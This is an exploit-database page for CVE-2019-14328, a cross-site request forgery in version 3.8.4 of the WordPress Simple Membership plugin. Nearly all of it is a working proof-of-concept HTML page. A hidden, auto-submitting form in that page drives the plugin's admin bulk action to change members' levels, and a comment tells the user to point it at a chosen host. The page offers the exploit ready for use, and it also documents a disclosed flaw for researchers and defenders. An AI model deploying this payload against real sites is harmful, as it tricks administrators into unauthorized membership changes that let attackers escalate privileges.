wordpress plugin simple membership 3.8.4 crosssite request forgery
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin # Date: 2019-07-27 # Exploit Author: rubyman # Vendor Homepage: https://wordpress.org/plugins/simple-membership/ # wpvulndb : https://wpvulndb.com/vulnerabilities/9482 # Version: 3.8.4 # Tested on: Windows 8.1 # CVE : CVE-2019-14328 # # Change localhost to your desired host # <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST"> <input type="hidden" name="swpm_bulk_change_level_from" value="2" /> <input type="hidden" name="swpm_bulk_change_level_to" value="3" /> <input type="hidden" name="swpm_bulk_change_level_process" value="Bulk Change Membership Level" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Wordpress plugin simple membership 3.8.4 crosssite request forgery Vulnerability / Exploit Source : Wordpress plugin simple membership 3.8.4 crosssite request forgery